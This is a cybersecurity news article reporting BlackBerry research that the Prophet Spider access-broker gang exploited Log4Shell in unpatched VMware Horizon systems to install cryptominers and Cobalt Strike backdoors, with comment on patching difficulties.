The Prophet Spider gang uses the Log4Shell vulnerability to target the Tomcat service in unpatched VMware Horizon systems. Credit: Thinkstock A gang of cybercriminals known for breaking into computer systems and selling access to them has been discovered exploiting an Apache Log4j vulnerability, Log4Shell, in unpatched VMware Horizon to plant cryptominers and backdoors on targeted systems.In a blog published Wednesday, Blackberry’ researchers Ryan Gibson, Codi Starks and Will Ikard revealed that Prophet Spider was behind the attacks, which could be reliably detected by monitoring ws_TomcatService.exe, the Tomcat service used by VMware Horizon.The researchers explained that after exploiting the Log4Shell vulnerability to penetrate a system, the attackers use PowerShell commands to download a second-stage payload. In the case of Prophet Spider, the payloads were primarily cryptocurrency mining software, although in some instances, Cobalt Strike beacons—a kind of system backdoor—were also installed on the computers. One of the indicators that helped pin the attacks to Prophet Spider was its use of the C:WindowsTemp7fde folder path to store malicious files, the researchers wrote. The threat actor also downloaded a copy of the wget.bin executable, which has historically been used by the group to get additional files onto infected hosts. The IP address used in the download cradle has also been previously attributed to the group. Prophet Spider foothold suggests an uptick in exploitsBlackBerry Vice President of Global Services and Technical Operations Tony Lee explains that initial access brokers like Prophet Spider break into computer systems, establish a foothold, then sell that access to another malicious actor, who will perform tasks such as steal data, move through the system laterally, or infect it with ransomware. “If they find the vulnerability, they’ll exploit it,” he said, “and then wait to see who the highest bidder will be.”“Now that they have the capability to gain a foothold in systems, I think we’ll see an uptick in Log4j exploitation,” Lee adds. Lee acknowledged that it was impossible to determine how many systems had been compromised by the group. “They can take anywhere from a couple of weeks to a month to sell access,” he explains. However, he says the Blackberry Research & Intelligence and Incident Response teams were able to confirm intrusions at multiple organizations.No individual industry vertical appeared to be in the gang’s crosshairs. “They seem opportunistic,” Lee says. “We haven’t seen a particular vertical being targeted. It’s more along the lines of ‘spray and pray.'”Many VMware implementations remain unpatchedIn their blog post, the Blackberry researchers noted that the exact number of applications—and their various versions—affected by the Log4j vulnerabilities may never be fully known. Although VMware released a patch and mitigation guidance in December 2021 in response to the vulnerability, they explained, many implementations remain unpatched, leaving them susceptible to exploitation. “It’s difficult for many organizations to scan and patch all their digital assets, even just the external facing ones,” Lee says. “I see organizations struggling with just identifying their assets. If you can’t identify them, then you certainly can’t scan them. And if you can’t scan them, then you can’t have an effective vulnerability management program.” Related content news CISA, FBI urge developers to patch path traversal bugs before shipping The advisory highlights how developers can follow best practices to fix these vulnerabilities during production. By Shweta Sharma May 03, 2024 3 mins Vulnerabilities news Microsoft continues to add, shuffle security execs in the wake of security incidents The company has appointed new product security chiefs as well as a customer-facing CISO as it continues to respond to high-profile attacks on its products and own network. By Elizabeth Montalbano May 03, 2024 4 mins CSO and CISO feature Malware explained: How to prevent, detect and recover from it What are the types of malware? How does malware spread? How do you know if you’re infected? We've got answers. By Josh Fruhlinger May 03, 2024 18 mins Ransomware Phishing Malware brandpost Sponsored by Cyber NewsWire LayerX Security Raises $26M for its Browser Security Platform, Enabling Employees to Work Securely from Any Browser, Anywhere Early adoption by Fortune 100 companies worldwide, LayerX already secures more users than any other browser security solution and enables unmatched security, performance and experience By Cyber NewsWire May 02, 2024 4 mins Cyberattacks Security PODCASTS VIDEOS RESOURCES EVENTS SUBSCRIBE TO OUR NEWSLETTER From our editors straight to your inbox Get started by entering your email address below. Please enter a valid email address Subscribe